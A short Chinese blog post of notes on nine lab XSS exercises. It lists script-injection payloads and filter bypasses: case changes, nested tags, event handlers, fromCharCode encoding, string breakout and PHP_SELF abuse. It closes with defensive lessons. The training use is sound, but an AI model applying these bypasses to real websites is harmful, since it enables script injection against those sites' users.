XSS 练习
from my wp blog
一个不错的网站,不错的渗透教程
虽然是很基础的东西,但是涵盖了好多知识
9道XSS练习题
解题过程
url参数直接写进html里面
?name=<script>alert(1)</script>
若果过滤<script></script>
不妨<sCript></sCript>
全过滤则是Pentest<script>erLab显示PentesterLab
则是<scrip<script>t>alert(1)</scrip</script>t>
若果怎样的<script>都不管用了,制造一堆事件
<a href=’javascript:alert(1)’
<img src=’zzzz’ onerror=’alert(1)’ />.
onmouseout, onmousemove….
alter被过滤
用 eval 和 String.fromCharCode()
把ascii数字转成字符再执行,可以获得alert(1)
prompt 和 confirm也是弹窗
若果?name=的值是写入<script></script>里面的,比如var s=””
那就在?name=“;alert(1);”,把东西写到双引号直接,注意每句结尾的分号
hp会把输出的内容html编码,htmlentities,<,>,,但是单引号’不在内
有些post提交表单是使用PHP_SELF,那么action的值就是url
这样修改url,../example8.php/><script>alert(0)</script><好了
面对静态文件,不要慌,看看里面的js怎么写的
js对url进行操作,写进html里,那就改url
把<script>嵌进里面</script>
小结
- 不能把url的东西往html里面写
- 表单的提交数据和各种url需要过滤